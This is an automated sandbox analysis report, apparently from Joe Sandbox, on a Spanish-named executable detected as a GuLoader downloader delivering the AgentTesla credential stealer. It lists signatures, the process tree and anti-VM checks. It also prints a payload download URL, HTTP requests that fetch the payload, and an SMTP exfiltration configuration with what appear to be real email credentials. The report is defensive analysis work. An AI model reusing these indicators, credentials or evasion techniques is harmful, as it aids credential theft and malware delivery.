Loading ...

Play interactive tourEdit tour

Windows Analysis Report Justificante.exe

Overview

General Information

Sample Name:Justificante.exe
Analysis ID:527132
MD5:7b58393d3df51a592b86e85fedc61f33
SHA1:362eb5f69fa705ecdb51ca380ea77c78c4390a2d
SHA256:3ad96272b8dd2e5d39a8cd1131ce862e31c0953cefe68b9e2f372a4dadad6d76
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • Justificante.exe (PID: 1776 cmdline: "C:\Users\user\Desktop\Justificante.exe" MD5: 7B58393D3DF51A592B86E85FEDC61F33)
    • CasPol.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\Justificante.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trkevinlog25@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1BlKZMF9MVJA&"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.75558223607.0000000001200000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: CasPol.exe PID: 7008JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 7008JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000006.00000000.75558223607.0000000001200000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1BlKZMF9MVJA&"}
            Source: CasPol.exe.7008.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trkevinlog25@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Justificante.exeVirustotal: Detection: 53%Perma Link
            Source: Justificante.exeReversingLabs: Detection: 48%
            Source: Justificante.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.11.20:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49808 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1BlKZMF9MVJA&
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0g7u5k11ld4lu4kfcj18c8hho068lo7a/1637666550000/11605847516605788748/*/1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-48-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpString found in binary or memory: http://tbLjUn.com
            Source: Justificante.exeString found in binary or memory: http://topqualityfreeware.com
            Source: Justificante.exeString found in binary or memory: http://www.topqualityfreeware.com/
            Source: CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.75750804342.0000000001619000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-48-docs.googleusercontent.com/
            Source: CasPol.exe, 00000006.00000002.76587639424.000000000160B000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-48-docs.googleusercontent.com/P
            Source: CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.75750804342.0000000001619000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0g7u5k11
            Source: CasPol.exe, 00000006.00000002.76587053720.0000000001598000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000006.00000002.76587053720.0000000001598000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/.f
            Source: CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76586836765.0000000001430000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76587346116.00000000015D6000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8
            Source: CasPol.exe, 00000006.00000002.76587346116.00000000015D6000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8Fj
            Source: CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8qurfYj4I-JJpWZhZY
            Source: CasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0g7u5k11ld4lu4kfcj18c8hho068lo7a/1637666550000/11605847516605788748/*/1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-48-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.11.20:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49808 version: TLS 1.2
            Source: Justificante.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_004090EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00EE4320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00EE1130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00EE3A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00EE3708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1E245E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1E2446C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1E246AF1
            Source: Justificante.exe, 00000002.00000002.75773650844.0000000000426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTERRORREGIMENTE.exe vs Justificante.exe
            Source: Justificante.exeBinary or memory string: OriginalFilenameTERRORREGIMENTE.exe vs Justificante.exe
            Source: Justificante.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Justificante.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Justificante.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: Justificante.exeVirustotal: Detection: 53%
            Source: Justificante.exeReversingLabs: Detection: 48%
            Source: Justificante.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Justificante.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\Justificante.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\Justificante.exe "C:\Users\user\Desktop\Justificante.exe"
            Source: C:\Users\user\Desktop\Justificante.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Justificante.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Justificante.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Justificante.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Justificante.exeFile created: C:\Users\user\AppData\Local\Temp\~DFB5365E8046653CC1.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@4/1@2/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000006.00000000.75558223607.0000000001200000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_0040440F pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_00403834 push es; ret
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_004044F3 pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_004051CC push dword ptr [esi]; iretd
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_00404592 pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_004045A7 pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_0040666B pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_004062CF pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_004072EF pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_00404287 pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_00404343 pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_0040634B pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_00404357 pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_004067EC pushfd ; retf
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_053A196C push C8AEE283h; ret
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_053A279D pushfd ; iretd
            Source: C:\Users\user\Desktop\Justificante.exeCode function: 2_2_053A0EE4 push ds; iretd
            Source: C:\Users\user\Desktop\Justificante.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\Justificante.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\Justificante.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Justificante.exe, 00000002.00000002.75778239526.00000000053C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: CasPol.exe, 00000006.00000002.76586836765.0000000001430000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1BLKZMF9MVJAQ4UPDWXLE5ANIOHZ7SZU8
            Source: Justificante.exe, 00000002.00000002.75778239526.00000000053C0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76586836765.0000000001430000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2724Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9956
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Justificante.exeSystem information queried: ModuleInformation
            Source: Justificante.exe, 00000002.00000002.75778304019.0000000005489000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Justificante.exe, 00000002.00000002.75778304019.0000000005489000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: CasPol.exe, 00000006.00000002.76587053720.0000000001598000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`Qa
            Source: Justificante.exe, 00000002.00000002.75778304019.0000000005489000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Justificante.exe, 00000002.00000002.75778239526.00000000053C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: Justificante.exe, 00000002.00000002.75778304019.0000000005489000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Justificante.exe, 00000002.00000002.75778304019.0000000005489000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000006.00000002.76586836765.0000000001430000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8
            Source: CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000006.00000002.76587639424.000000000160B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: CasPol.exe, 00000006.00000002.76587639424.000000000160B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW,
            Source: Justificante.exe, 00000002.00000002.75778239526.00000000053C0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76586836765.0000000001430000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Justificante.exe, 00000002.00000002.75778304019.0000000005489000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Justificante.exe, 00000002.00000002.75778304019.0000000005489000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Justificante.exe, 00000002.00000002.75778304019.0000000005489000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000006.00000002.76588942358.00000000031B9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
